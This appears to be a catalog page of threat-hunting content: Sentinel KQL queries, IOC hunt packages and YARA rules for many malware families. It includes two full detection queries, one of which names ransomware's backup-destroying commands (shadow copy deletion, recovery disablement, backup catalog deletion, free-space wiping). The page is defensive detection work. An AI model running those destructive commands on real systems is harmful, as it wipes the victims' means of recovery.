This query was originally published in the threat analytics report, OSX/SurfBuyer adware campaign. It will return results if a shell script has furtively attempted to decode and save a file to a /tmp

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Trickbot: Pervasive & underestimated. Trickbot is a very prevalent piece of malware with an array of malicious capabilities. Origina

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query identifies common processes run by ransomware malware to destroy volume shadow copies or clean free space on a drive to prevent a file from being recovered post-encryption. To reduce false

apthuntingmicrosoftofficialransomware
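As an added example that is not the catalogued query's own code, this advanced-hunting KQL covers the pre-encryption commands described above: shadow copy deletion and shadow storage resizing through vssadmin and wmic, recovery disablement through bcdedit, backup catalog deletion through wbadmin, free-space wiping through cipher, and the WMI route from PowerShell. The seven-day lookback and the parent-process allowlist placeholder are assumptions; populate the allowlist with your own backup software before relying on the result.

```kql
// Added example, not the catalogued query: commands used to remove recovery
// options ahead of encryption. Grouped per device and account so a burst of
// several different commands stands out from a lone administrative resize.
let lookback = 7d;                                            // assumed window
let allowedParents = dynamic(["backupagent.exe"]);            // assumed placeholder: your backup software
DeviceProcessEvents
| where Timestamp > ago(lookback)
| extend Cmd = tolower(ProcessCommandLine)
| where (FileName =~ "vssadmin.exe" and Cmd has_all ("delete", "shadows"))
     or (FileName =~ "vssadmin.exe" and Cmd has_all ("resize", "shadowstorage"))
     or (FileName =~ "wmic.exe"     and Cmd has_all ("shadowcopy", "delete"))
     or (FileName =~ "bcdedit.exe"  and (Cmd has "recoveryenabled" or Cmd has "bootstatuspolicy"))
     or (FileName =~ "wbadmin.exe"  and Cmd has_all ("delete", "catalog"))
     or (FileName =~ "cipher.exe"   and Cmd contains "/w:")
     or (FileName in~ ("powershell.exe", "pwsh.exe") and Cmd has "win32_shadowcopy" and Cmd has "delete")
// Backup agents legitimately resize shadow storage; exclude known parents.
| where not(InitiatingProcessFileName in~ (allowedParents))
| summarize Hits = count(), DistinctTools = dcount(FileName),
            First = min(Timestamp), Last = max(Timestamp),
            Commands = make_set(ProcessCommandLine, 10)
          by DeviceName, AccountName, InitiatingProcessFileName
| order by DistinctTools desc, Hits desc
```

Sorting on DistinctTools first is deliberate: one vssadmin resize from a backup window is routine, but vssadmin, bcdedit and wbadmin from the same account within minutes is the ransomware pre-flight sequence and should page someone.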
Azure-Sentinel source
DeviceProcessEventsEmailEvents

Malicious emails often contain documents and other specially crafted attachments that run PowerShell commands to deliver additional payloads. If you are aware of emails coming from a known malicious s

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Finds PowerShell execution events that could involve a download.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Finds executions of PowerShell version 2.0, either to discover legacy scripts that still use version 2 or to find attackers trying to evade script block logging and AMSI.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceEvents

Finds all machines running a given PowerShell cmdlet. This covers all PowerShell commands executed in the PowerShell engine by any process.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceEvents

Finds which uncommon PowerShell cmdlets were executed on a given machine in a certain time period. This covers all PowerShell commands executed in the PowerShell engine by any process.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Python abuse on macOS. The Python programming language comes bundled with macOS. In threat intelligence gathered from macOS endpoints

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware. Qakbot is malware that steals login credentials from banking and financial services. It has

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
T1204.004
DeviceRegistryEvents

Identifies non-ASCII data written to the RunMRU registry key by explorer.

huntingmicrosoftofficial
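As an added example that is not the catalogued query's own code, this advanced-hunting KQL implements the check above. Commands typed into the Win+R box are persisted by explorer.exe under the RunMRU key, so a value containing bytes outside printable ASCII is a strong signal for a pasted "fix" lure. The seven-day lookback and the printable-ASCII byte range are assumptions; the MRUList exclusion removes the ordering entry, which is never a command.

```kql
// Added example, not the catalogued query: non-ASCII data landing in the
// RunMRU key via explorer.exe, i.e. something pasted into the Run dialog.
DeviceRegistryEvents
| where Timestamp > ago(7d)                                   // assumed lookback
| where ActionType == "RegistryValueSet"
| where RegistryKey endswith @"\Explorer\RunMRU"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryValueName != "MRUList"                        // ordering entry, not a command
// RE2 character class: anything outside printable 7-bit ASCII (assumed range).
| where RegistryValueData matches regex @"[^\x20-\x7E]"
| project Timestamp, DeviceName, AccountName = InitiatingProcessAccountName,
          RegistryValueName, RegistryValueData
| order by Timestamp desc
```

Expect a small amount of benign noise from paths that contain accented user or folder names; an exclusion on those prefixes keeps the rule quiet without hiding the Unicode padding, zero-width characters and look-alike glyphs that the lures rely on.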
sql-server-abuse
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, SQL Server abuse. SQL Server offers a vast array of tools for automating tasks, exporting data, and running scripts. These legitimat

exploithuntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 8 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 60 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 17 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 23 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
DeviceFileEvents

The nccTrojan malware is a stealthy backdoor that establishes persistent remote access, exfiltrates sensitive data, and executes arbitrary commands to compromise infected systems. It typically arrives via phishing emails with malicious attachments or exploit kits bundled with legitimate software. SOC analysts should monitor

backdooriocthreatfoxwin-ncctrojan
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

PureRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands,

backdooriocthreatfoxwin-pure_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Remcos is a remote access Trojan (RAT) that enables attackers to steal sensitive data, execute arbitrary

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and leveraging stolen credentials for lateral movement. It typically arrives through phishing emails with malicious attachments or compromised websites, using URL and domain-based command-and

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 17 IOCs associated with VShell

iocthreatfoxwin-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

XWorm is a multi-stage malware that establishes persistence, exfiltrates data, and leverages command-and-control (C2) communication to execute further malicious activities. It typically arrives via phishing emails containing malicious links or compromised domains/IPs used for initial compromise. SOC analysts should monitor for unusual network traffic patterns, lateral

iocthreatfoxwin-xworm
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

exploithuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 46 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 54e64e

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 28 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a backdoor that enables remote

iocurlhaus
Azure-Sentinel source
DeviceProcessEvents

This query looks for common webserver process names and identifies any processes launched using a scripting language (cmd, powershell, wscript, cscript), common initial profiling commands (net \ net1

huntingmicrosoftofficialpowershell
Yara-Rules source

Encoded version of pcclient found on disk

community
Yara-Rules source

File matching the md5 above tends to only live in memory, hence the lack of MZ header check.

community
Yara-Rules source

File matching the md5 above tends to only live in memory, hence the lack of MZ header check.

community
Yara-Rules source

Detects code from APT wateringhole

aptcommunity
Yara-Rules source

APT malware used to drop PcClient RAT

aptbackdoorcommunity
Yara-Rules source

The YARA rule 'apt_c16_win64

aptbackdoorcommunity
Yara-Rules source

3102 code features

community
Yara-Rules source

3102 Identifying Strings

community
9002
yara low
Yara-Rules source

9002

community
Yara-Rules source

9002 code features

community
Yara-Rules source

9002 Identifying Strings

community
Azure-Sentinel source
T1566
EmailEvents

This query helps review the count of users attacked more than x times the average.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query will identify strings in process command lines which match Base64 encoding format, extract the string to a column called Base64, and decode it in a column called DecodedString.

huntingmicrosoftofficial
Base64encodePEFile
kql medium
Azure-Sentinel source
DeviceProcessEvents

Finds base64-encoded PE file headers seen in command line parameters. Tags: #fileLess #powershell.

huntingmicrosoftofficialpowershell
Bitsadmin Activity
kql medium
Azure-Sentinel source
DeviceProcessEvents

Background Intelligent Transfer Service (BITS) is a way to reliably download files from webservers or SMB servers. This service is commonly used for legitimate purposes, but can also be used as part

backdoorhuntingmicrosoftofficial
Yara-Rules source

Detects BlackEnergy 2 Malware

community
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the trend of malicious URL clicks that were blocked by Safe Links over the past 30 days, helping analysts monitor the effectiveness of click protection policies. Based on Defender for Offic

huntingmicrosoftofficial
Yara-Rules source

This is a patched CMD. This is the CMD that RoyalCli uses.

community
Azure-Sentinel source
DeviceProcessEvents

This query will detect encoded powershell based on the parameters passed during process creation. This query will also work if the PowerShell executable is renamed or tampered with since detection is

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceImageLoadEvents

This query looks for processes that load an older version of the system.management.automation libraries. While not inherently malicious, downgrading to PowerShell version 2 can enable an attacker to b

evasionhuntingmicrosoftofficialpowershell
Azure-Sentinel source
T1566
UrlClickEvents

This query helps review the list of top users who clicked on Phish URLs

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Process executed from a binary hidden in a Base64-encoded file. Encoding malicious software is a technique to obfuscate files from detection. The first and second ProcessCommandLine component is looking

huntingmicrosoftofficial
FE APT 9002
yara low
Yara-Rules source

YARA rule: FE_APT_9002

aptcommunity
Azure-Sentinel source
DeviceFileEventsDeviceLogonEventsDeviceNetworkEventsDeviceProcessEvents

This query identifies files that are copied to a device over SMB, then executed within a specified threshold. Default is 5 seconds, but is configurable by tweaking the value for ToleranceInSeconds.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

Visualises malicious URL clicks that were allowed through Safe Links over time, helping analysts identify when users bypass security controls and click on malicious content. Based on Defender for Offi

evasionhuntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

Visualises emails containing QR code URLs that have been detected as malicious, helping analysts identify QR code-based attack campaigns. Based on Defender for Office 365 workbook: https://techcommuni

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps reviewing sender IPs sending malicious email of type Malware or Phish

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

Visualises click attempts on malicious URLs, grouped by workload (such as Exchange, Teams, SharePoint, Copilot etc.), to help analysts understand which workloads are most targeted. Based on Defender f

huntingmicrosoftofficial
APT15 bs2005
yara low
Yara-Rules source

APT15 bs2005

aptcommunity
Yara-Rules source

This is an exchange enumeration/hijacking tool used by APT 15

aptbackdoorcommunity
Yara-Rules source

Finds generic data potentially relating to APT15 tools

community
Yara-Rules source

Generic strings found in the Royal CLI tool

community
Yara-Rules source

APT15 RoyalCli backdoor

aptbackdoorcommunity
Yara-Rules source

DNS backdoor used by APT15

aptbackdoorcommunity
Azure-Sentinel source
DeviceProcessEvents

Finding attackers hiding malware in the recycle bin. Read more here: https://azure.microsoft.com/blog/how-azure-security-center-helps-reveal-a-cyberattack/. Tags: #execution #SuspiciousPath.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Finds legitimate system32 or syswow64 executables being run under a different name and in a different location. The rule will require tuning for your environment. MITRE: Masquerading https://attack.mi

huntingmicrosoftofficial
Yara-Rules source

Detects PAS Tool PHP Web Kit

community
Azure-Sentinel source
T1566
EmailUrlInfo

The query helps detect emails associated with the open redirector URL campaign using Defender for Office 365 data.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566

This query visualises the daily amount of emails that had an admin post-delivery action, summarizing the data by action type

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query visualises the amount of emails that had a post-delivery action, summarizing the data daily by the final location resulting from the action

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query visualises the daily amount of emails that had a post-delivery action from zero-hour auto purge, summarizing by phish, spam or malware detection action

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query visualises the daily amount of emails that had a post-delivery action from zero-hour auto purge.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query provides insights on the detections done by SafeLinks protection in Defender for Office 365

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DeviceFileEventsDnsEvents

Hunt package for 61 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: EtherRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with EtherRAT

backdooriocjs-ether_ratthreatfox
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 32 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with ACR Stealer

infostealeriocthreatfoxwin-acr_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 36 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a remote access Trojan that enables adversaries to exfiltrate data and execute commands on infected systems. It typically arrives via phishing emails or malicious downloads, establishing communication through the identified IP:port

backdooriocthreatfoxwin-dcrat
ThreatFox: GCleaner IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 5 IOCs associated with GCleaner

iocthreatfoxwin-gcleaner
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with PureRAT

backdooriocthreatfoxwin-pure_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 17 IOCs associated with VShell

iocthreatfoxwin-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with XWorm

iocthreatfoxwin-xworm
Azure-Sentinel source
T1566
EmailEvents

This query helps review the list of the top 10% most attacked users

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query helps review the list of the top 10 URL domains attacking the organization

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the top 10 users with click attempts on URLs in emails detected as malware, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook:

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the top 10 users with click attempts on URLs in emails detected as phishing, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook:

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the top 10 users with click attempts on URLs in emails detected as spam, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook: htt

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review the top external malicious senders of malware or phishing emails in an organization in the last 30 days

huntingmicrosoftofficialphishing
Top targeted users
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query helps review the top users targeted with malware or phishing emails in an organization in the last 30 days

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the total amount of click attempts on URLs with detections, split by the different threat types identified. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/bl

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query helps review the URL click count by ClickAction

huntingmicrosoftofficial
Azure-Sentinel source
T1566
AlertEvidenceUrlClickEvents

In this query, we are looking for URL clicks on emails that were actioned by zero-hour auto purge

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

In this query, we are looking at URL click actions by URL in the last 7 days

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

Summarizes URL click events by action type to help analysts understand user click behavior and policy effectiveness. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/blog

huntingmicrosoftofficial
Azure-Sentinel source
T1566
AlertEvidenceUrlClickEvents

In this query, we are looking for URL clicks on emails that generated the alert "A potentially malicious URL click was detected"

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as 102-220-160-47

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 176-65-139-194

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as 176-65-139-7

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 176-65-139-99

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as 176-65-149-239

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as 93-115-172-57

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as dropped-by-Phorpiex

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 34 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mirai malware family compromises IoT devices by exploiting default credentials, turning them into bots for large-scale DDoS

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as RemcosRAT

backdooriocurlhaus
URLs by location
kql medium
Azure-Sentinel source
T1566
EmailUrlInfo

Visualises where URLs have been identified in emails, summarizing by location (for example: Attachment, header, body) to help analysts understand distribution and risk. Based on Defender for Office 36

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query helps review malicious clicks where the user was allowed to proceed through the malicious URL page.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsUrlClickEvents

This query provides insights on users who clicked on a suspicious URL

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsUrlClickEvents

This query helps determine click-throughs when email was delivered because of detection overrides.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
CloudAppEvents

This query helps review user-reported email submissions

huntingmicrosoftofficial
Yara-Rules source

Detects PAS Tool PHP Web Kit

community
Yara-Rules source

Detects PAS Tool PHP Web Kit

community
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the daily amount of admin false negative submissions by submission type.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the daily amount of admin false positive submissions by submission type.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises all emails submitted as false positives by admins, summarizing by the original filter verdict threat type

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the original detection technology of emails submitted as phish false positive by admins

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the original detection technology of emails submitted as spam false positive by admins

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of admin false negative or false positive submissions by the verdict of the submission grading.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of admin false negative submissions by the state of the submission.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of admin false positive submissions by the state of the submission.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query helps review admin-reported email submissions

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of admin false positive submissions by submission type.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX

community
Ham backdoor
yara low
Yara-Rules source

YARA rule: Ham_backdoor

backdoorcommunity
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish (BEC) - Impersonation detections over time.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

The YARA rule 'PLUGX_RedLeaves' detects specific RedLeaves and PlugX malware binaries associated with advanced persistent threat campaigns. SOC teams should deploy

community
Yara-Rules source

The YARA rule 'RED

backdoorcommunity
Yara-Rules source

Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT

backdoorcommunity
Yara-Rules source

Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT

backdoorcommunity
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

Hunting for credential phishing using the "Referral" infrastructure using Defender for Office 365 data

credential-thefthuntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailEvents

This query helps review the count of spoof and impersonation detections per sender IP

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review the count of phish detections made by spoof detection methods

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish (BEC) Spoof detections by Detection Technology

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish (BEC) Spoof detections by Detection Technology over time

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Business Email Compromise (BEC) spoofing detections over time, summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query helps review the status of submissions

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: PerlBot IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with PerlBot

elf-perlbotiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 6 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DeviceFileEventsDnsEvents

Hunt package for 39 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsDnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox: magecart IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with magecart

iocjs-magecartthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 21 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
